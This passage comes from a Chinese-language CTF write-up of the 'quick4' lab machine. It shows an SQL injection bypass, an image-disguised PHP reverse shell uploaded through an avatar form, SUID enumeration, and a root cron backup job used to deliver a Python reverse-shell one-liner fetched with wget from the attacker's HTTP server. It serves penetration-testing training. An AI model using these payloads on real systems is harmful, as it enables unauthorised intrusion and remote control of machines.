src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116219.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316192523643\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5931\u8d25\u4e86\uff0c\u4f46\u662f\u4f3c\u4e4e\u6709\u70b9\u4f5c\u7528\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116220.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116220.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316192544911\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u4e00\u4e0b\u5176\u4ed6\u7684payload\uff0c\u5c71\u7a77\u6c34\u5c3d\u7684\u65f6\u5019\u518d\u8bd5\u8bd5sqlmap\u3002<\/p>\n<p>\u65e0\u610f\u4e2d\u8bd5\u51fa\u6765\u4e86\u4e00\u79cd\uff1a<code>&#039; OR &#039;1<\/code><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116221.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116221.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316192758082\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53ef\u4ee5\u5b66\u4e60\u53c2\u8003\uff1a<a href=\"https:\/\/github.com\/payloadbox\/sql-injection-payload-list\">https:\/\/github.com\/payloadbox\/sql-injection-payload-list<\/a><\/p>\n<h3>\u56fe\u7247\u4e0a\u4f20\u53cd\u5f39shell<\/h3>\n<p>\u5c1d\u8bd5\u5bfb\u627e\u53ef\u4ee5\u4e0a\u4f20\u6587\u4ef6\u7684\u5730\u65b9\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116222.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116222.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316193209601\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u4e00\u4e2a\u4e0a\u4f20\u70b9\uff0c\u4e0d\u8fc7\u662f\u4e0a\u4f20\u5934\u50cf\u7684\uff0c\u5c1d\u8bd5\u4e0a\u4f20\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp]\n\u2514\u2500$ head reverseShell.jpg                                                            \nGIF89a\n  &lt;?php\n  \/\/ php-reverse-shell - A Reverse Shell implementation in PHP\n  \/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\n  set_time_limit (0);\n  $VERSION = &quot;1.0&quot;;\n  $ip = &#039;10.161.181.188&#039;;  \/\/ You have changed this\n  $port = 1234;  \/\/ And this\n  $chunk_size = 1400;<\/code><\/pre>\n<p>\u5148\u5c1d\u8bd5\u6dfb\u52a0\u4e00\u4e2a\u5458\u5de5\u8bd5\u8bd5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116223.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116223.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316193543842\" \/><\/div><\/p>\n<p>\u5361\u4f4f\u4e86\uff0c\u5636\u3002\u770b\u6765\u4e0d\u9614\u4ee5\uff0c\u4e0a\u4f20\u5427\uff0c\u4f46\u662f\u70b9\u51fb\u5b8c\u53c8\u5f39\u5230\u6dfb\u52a0\u8fd9\u4e86\uff0c\u6211\u8fd8\u4ee5\u4e3a\u662f\u6211\u521a\u521a\u81ea\u5df1\u70b9\u7684\u5462\uff0c\u53ef\u80fd\u4e0a\u4f20\u6210\u529f\u4e86\uff0c\u5c1d\u8bd5\u67e5\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116224.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116224.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316194353950\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116225.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116225.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316194146174\" \/><\/div><\/p>\n<p>\u96be\u9053\u6ca1\u6210\u529f\uff0c\u518d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116226.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116226.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316194257971\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u611f\u89c9\u662f\u6210\u529f\u4e86\u554a\uff0c\u90fd\u590d\u539f\u5230\u6dfb\u52a0\u7528\u6237\u7684\u4f4d\u7f6e\u4e86\u3002<\/p>\n<p>\u96be\u9053\u5904\u7406\u4e86\uff1f\u8fd9\u548b\u731c\u554a\u3002<\/p>\n<p><del><a href=\"http:\/\/10.161.187.177\/employee\/uploads\/img_reverseShell.jpg\">http:\/\/10.161.187.177\/employee\/uploads\/img_reverseShell.jpg<\/a><\/del><\/p>\n<p><del><a href=\"http:\/\/10.161.187.177\/employee\/uploads\/image_reverseShell.jpg\">http:\/\/10.161.187.177\/employee\/uploads\/image_reverseShell.jpg<\/a><\/del><\/p>\n<p>\u603b\u4e0d\u81f3\u4e8e\u628a\u540d\u5b57\u968f\u673a\u5316\u6210\u5b57\u7b26\u4e32\u4e86\u5427\uff0c\u96be\u9053\u6ca1\u4e0a\u4f20\u6210\u529f\uff1f<\/p>\n<p><del><a href=\"http:\/\/10.161.187.177\/employee\/uploads\/_reverseShell.jpg\">http:\/\/10.161.187.177\/employee\/uploads\/_reverseShell.jpg<\/a><\/del><\/p>\n<p><del><a href=\"http:\/\/10.161.187.177\/employee\/uploads\/employee_reverseShell.jpg\">http:\/\/10.161.187.177\/employee\/uploads\/employee_reverseShell.jpg<\/a><\/del><\/p>\n<p><del><a href=\"http:\/\/10.161.187.177\/employee\/uploads\/2024-03-16_reverseShell.jpg\">http:\/\/10.161.187.177\/employee\/uploads\/2024-03-16_reverseShell.jpg<\/a><\/del><\/p>\n<p><del><a href=\"http:\/\/10.161.187.177\/employee\/uploads\/reverseShell_2024-03-16.jpg\">http:\/\/10.161.187.177\/employee\/uploads\/reverseShell_2024-03-16.jpg<\/a><\/del><\/p>\n<p>\u7ecf\u7fa4\u91cc\u5e08\u5085\u4eec\u63d0\u793a\uff08\u597d\u5427\u662f\u6211\u5077\u5077\u7ffb\u4e86\u804a\u5929\u8bb0\u5f55\uff09\uff0c\u53d1\u73b0\u540d\u5b57\u4e3a\uff1a<\/p>\n<p><del><a href=\"http:\/\/10.161.187.177\/employee\/uploads\/1_reverseShell.jpg\">http:\/\/10.161.187.177\/employee\/uploads\/1_reverseShell.jpg<\/a><\/del><\/p>\n<p><a href=\"http:\/\/10.161.187.177\/employee\/uploads\/2_reverseShell.jpg\">http:\/\/10.161.187.177\/employee\/uploads\/2_reverseShell.jpg<\/a><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116227.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116227.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316195129340\" \/><\/div><\/p>\n<p>\u4f46\u662f\u6ca1\u4e0a\u4f20\u6210\u529f\uff0c\u6293\u5305\u770b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116228.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116228.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316195651260\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u96be\u9053\u540e\u7aef\u5bf9\u6587\u4ef6\u8fdb\u884c\u6821\u9a8c\u4e86\uff1f\u628a\u6587\u4ef6\u540d\u8be5\u56de\u53bb\u8bd5\u8bd5\uff0c\u518d\u770b\u770b\u662f\u5426\u53ef\u4ee5\u67e5\u770b\u5230\u4e0a\u4f20\u7684\u5185\u5bb9\uff1a<\/p>\n<pre><code class=\"language-url\">http:\/\/10.161.187.177\/employee\/uploads\/2_reverseShell.php<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116229.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116229.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316195914182\" \/><\/div><\/p>\n<p>shell\u5f39\u56de\u6765\u4e86\uff0c\u6211\u53bb\u771f\u7684\u5201\u94bb\u3002<\/p>\n<p>\u67e5\u770bflag\uff1a<\/p>\n<pre><code class=\"language-bash\">$ ls -la\ntotal 1840208\ndrwxr-xr-x  20 root root       4096 Jan 14 20:49 .\ndrwxr-xr-x  20 root root       4096 Jan 14 20:49 ..\nlrwxrwxrwx   1 root root          7 Aug 10  2023 bin -&gt; usr\/bin\ndrwxr-xr-x   4 root root       4096 Feb  4 18:59 boot\ndr-xr-xr-x   2 root root       4096 Aug 10  2023 cdrom\ndrwxr-xr-x  20 root root       4000 Mar 16 18:01 dev\ndrwxr-xr-x 100 root root       4096 Feb 12 06:21 etc\ndrwxr-xr-x  11 root root       4096 Feb  8 21:56 home\nlrwxrwxrwx   1 root root          7 Aug 10  2023 lib -&gt; usr\/lib\nlrwxrwxrwx   1 root root          9 Aug 10  2023 lib32 -&gt; usr\/lib32\nlrwxrwxrwx   1 root root          9 Aug 10  2023 lib64 -&gt; usr\/lib64\nlrwxrwxrwx   1 root root         10 Aug 10  2023 libx32 -&gt; usr\/libx32\ndrwx------   2 root root      16384 Jan 14 20:47 lost+found\ndrwxr-xr-x   2 root root       4096 Aug 10  2023 media\ndrwxr-xr-x   2 root root       4096 Aug 10  2023 mnt\ndrwxr-xr-x   2 root root       4096 Aug 10  2023 opt\ndr-xr-xr-x 265 root root          0 Mar 16 18:01 proc\ndrwx------   7 root root       4096 Feb 12 16:10 root\ndrwxr-xr-x  32 root root        900 Mar 16 18:53 run\nlrwxrwxrwx   1 root root          8 Aug 10  2023 sbin -&gt; usr\/sbin\ndrwxr-xr-x   6 root root       4096 Aug 10  2023 snap\ndrwxr-xr-x   2 root root       4096 Aug 10  2023 srv\n-rw-------   1 root root 1884291072 Jan 14 20:49 swap.img\ndr-xr-xr-x  13 root root          0 Mar 16 18:01 sys\ndrwxrwxrwt   2 root root       4096 Mar 16 19:57 tmp\ndrwxr-xr-x  14 root root       4096 Aug 10  2023 usr\ndrwxr-xr-x  14 root root       4096 Jan 21 14:02 var\n$ cd \/home\n$ ls\nandrew\ncoos\njeff\njohn\njuan\nlara\nlee\nmike\nnick\nuser.txt\n$ cat user.txt<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116230.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116230.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316200307315\" \/><\/div><\/p>\n<p>flag\u6211\u63d0\u4ea4\u4e86\uff0c\u5c31\u4e0d\u622a\u56fe\u4e86\u3002<\/p>\n<h2>\u63d0\u6743<\/h2>\n<p>\u67e5\u770b\u4e00\u4e0b\u57fa\u7840\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-bash\">$ whoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n$ sudo -l\nsudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper                                                               \nsudo: a password is required\n$ find \/-perm -u=s -type f 2&gt;\/dev\/null\n$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/snap\/snapd\/19457\/usr\/lib\/snapd\/snap-confine\n\/snap\/snapd\/20671\/usr\/lib\/snapd\/snap-confine\n\/snap\/core20\/1974\/usr\/bin\/chfn\n\/snap\/core20\/1974\/usr\/bin\/chsh\n\/snap\/core20\/1974\/usr\/bin\/gpasswd\n\/snap\/core20\/1974\/usr\/bin\/mount\n\/snap\/core20\/1974\/usr\/bin\/newgrp\n\/snap\/core20\/1974\/usr\/bin\/passwd\n\/snap\/core20\/1974\/usr\/bin\/su\n\/snap\/core20\/1974\/usr\/bin\/sudo\n\/snap\/core20\/1974\/usr\/bin\/umount\n\/snap\/core20\/1974\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/1974\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/core20\/2105\/usr\/bin\/chfn\n\/snap\/core20\/2105\/usr\/bin\/chsh\n\/snap\/core20\/2105\/usr\/bin\/gpasswd\n\/snap\/core20\/2105\/usr\/bin\/mount\n\/snap\/core20\/2105\/usr\/bin\/newgrp\n\/snap\/core20\/2105\/usr\/bin\/passwd\n\/snap\/core20\/2105\/usr\/bin\/su\n\/snap\/core20\/2105\/usr\/bin\/sudo\n\/snap\/core20\/2105\/usr\/bin\/umount\n\/snap\/core20\/2105\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/2105\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/libexec\/polkit-agent-helper-1<\/code><\/pre>\n<p>yehe\uff0c\u6709sudo\uff0cnice\uff01\u7b49\u4e0b\uff0c\u6211\u4e0d\u77e5\u9053\u5bc6\u7801\u5440\u3002\u3002\u3002\u3002\u3002<\/p>\n<h3>\u6269\u5c55\u4e00\u4e0bshell<\/h3>\n<pre><code class=\"language-bash\">python3 -c &#039;import pty;pty.spawn(&quot;\/bin\/bash&quot;)&#039;<\/code><\/pre>\n<h3>\u67e5\u770b\u4e00\u4e0b\u5b9a\u65f6\u4efb\u52a1<\/h3>\n<pre><code class=\"language-bash\">www-data@quick4:\/$ ls -al \/etc\/cron*\nls -al \/etc\/cron*\n-rw-r--r-- 1 root root 1183 Feb 12 06:21 \/etc\/crontab\n\n\/etc\/cron.d:\ntotal 20\ndrwxr-xr-x   2 root root 4096 Jan 21 14:13 .\ndrwxr-xr-x 100 root root 4096 Feb 12 06:21 ..\n-rw-r--r--   1 root root  102 Mar 23  2022 .placeholder\n-rw-r--r--   1 root root  201 Jan  8  2022 e2scrub_all\n-rw-r--r--   1 root root  712 Jan 28  2022 php\n\n\/etc\/cron.daily:\ntotal 36\ndrwxr-xr-x   2 root root 4096 Jan 21 14:02 .\ndrwxr-xr-x 100 root root 4096 Feb 12 06:21 ..\n-rw-r--r--   1 root root  102 Mar 23  2022 .placeholder\n-rwxr-xr-x   1 root root  539 May  3  2023 apache2\n-rwxr-xr-x   1 root root  376 Nov 11  2019 apport\n-rwxr-xr-x   1 root root 1478 Apr  8  2022 apt-compat\n-rwxr-xr-x   1 root root  123 Dec  5  2021 dpkg\n-rwxr-xr-x   1 root root  377 May 25  2022 logrotate\n-rwxr-xr-x   1 root root 1330 Mar 17  2022 man-db\n\n\/etc\/cron.hourly:\ntotal 12\ndrwxr-xr-x   2 root root 4096 Aug 10  2023 .\ndrwxr-xr-x 100 root root 4096 Feb 12 06:21 ..\n-rw-r--r--   1 root root  102 Mar 23  2022 .placeholder\n\n\/etc\/cron.monthly:\ntotal 12\ndrwxr-xr-x   2 root root 4096 Aug 10  2023 .\ndrwxr-xr-x 100 root root 4096 Feb 12 06:21 ..\n-rw-r--r--   1 root root  102 Mar 23  2022 .placeholder\n\n\/etc\/cron.weekly:\ntotal 16\ndrwxr-xr-x   2 root root 4096 Aug 10  2023 .\ndrwxr-xr-x 100 root root 4096 Feb 12 06:21 ..\n-rw-r--r--   1 root root  102 Mar 23  2022 .placeholder\n-rwxr-xr-x   1 root root 1020 Mar 17  2022 man-db\nwww-data@quick4:\/$ cat \/etc\/cron*                \ncat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\ncat: \/etc\/cron.weekly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don&#039;t have to run the `crontab&#039;\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\n# You can also override PATH, but by default, newer versions inherit it from the environment\n#PATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# |  .------------- hour (0 - 23)\n# |  |  .---------- day of month (1 - 31)\n# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...\n# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# |  |  |  |  |\n# *  *  *  *  * user-name command to be executed\n*\/1 *   * * *   root    \/usr\/local\/bin\/backup.sh\n17 *    * * *   root    cd \/ &amp;&amp; run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.daily )\n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.weekly )\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.monthly )\n#<\/code><\/pre>\n<p>hhh\uff0c\u771f\u6709\u5b9a\u65f6\u4efb\u52a1\u6b38\uff0c\u67e5\u770b\u4e00\u4e0b\u8fd9\u4e2a\u811a\u672c\uff1a<\/p>\n<pre><code class=\"language-bash\">#!\/bin\/bash\ncd \/var\/www\/html\/\ntar czf \/var\/backups\/backup-website.tar.gz *<\/code><\/pre>\n<h3>\u5b9a\u65f6\u4efb\u52a1\u53cd\u5f39shell<\/h3>\n<p>\u662f\u4e2a\u81ea\u52a8\u5907\u4efd\u811a\u672c\uff0c\u770b\u770b\u662f\u5426\u53ef\u7f16\u8f91\uff0c\u7b49\u4e0b\u6211\u8981\u7f16\u8f91\u5b83\u5e72\u5565\uff0c\u6211\u53ef\u4ee5\u76f4\u63a5\u4f20\u4e00\u4e2a\u53cd\u5f39shell\u4e0a\u53bb\u8ba9\u4ed6\u89e3\u538b\u5440\uff01nice!<\/p>\n<p>\u56e0\u4e3a\u6709python\uff0c\u76f4\u63a5\u4f20python\u811a\u672c\u4e86\uff1a<\/p>\n<pre><code class=\"language-python\"># kali\npython -m http.server 8888\n# quick4\nwget http:\/\/10.161.181.188:8888\/fuck.py\n# fuck.py\npython -c &#039;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;10.161.181.188&quot;,4321));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(&quot;\/bin\/bash&quot;)&#039;<\/code><\/pre>\n<pre><code class=\"language-bash\">www-data@quick4:\/$ cd \/var\/www\/html\/\ncd \/var\/www\/html\/\nwww-data@quick4:\/var\/www\/html$ wget http:\/\/10.161.181.188:8888\/fuck.py\nwget http:\/\/10.161.181.188:8888\/fuck.py\n--2024-03-16 20:17:49--  http:\/\/10.161.181.188:8888\/fuck.py\nConnecting to 10.161.181.188:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 228 [text\/x-python]\nSaving to: \u2018fuck.py\u2019\n\nfuck.py             100%[===================&gt;]     228  --.-KB\/s    in 0s      \n\n2024-03-16 20:17:49 (39.6 MB\/s) - \u2018fuck.py\u2019 saved [228\/228]\n\nwww-data@quick4:\/var\/www\/html$ ls -la\nls -la\ntotal 148\ndrwxr-xr-x 14 www-data www-data  4096 Mar 16 20:17 .\ndrwxr-xr-x  3 root     root      4096 Jan 21 14:02 ..\ndrwxr-xr-x  2 www-data www-data  4096 Feb  6 13:55 .well-known\n-rw-r--r--  1 www-data www-data   871 Jan 21 20:24 404.css\n-rw-r--r--  1 www-data www-data  5014 Feb  5 14:36 404.html\ndrwxr-xr-x  3 root     root      4096 Feb  8 21:07 careers\ndrwxr-xr-x  2 www-data www-data  4096 Jan 30 21:29 css\ndrwxr-xr-x  7 www-data www-data  4096 Feb 12 16:05 customer\ndrwxr-xr-x 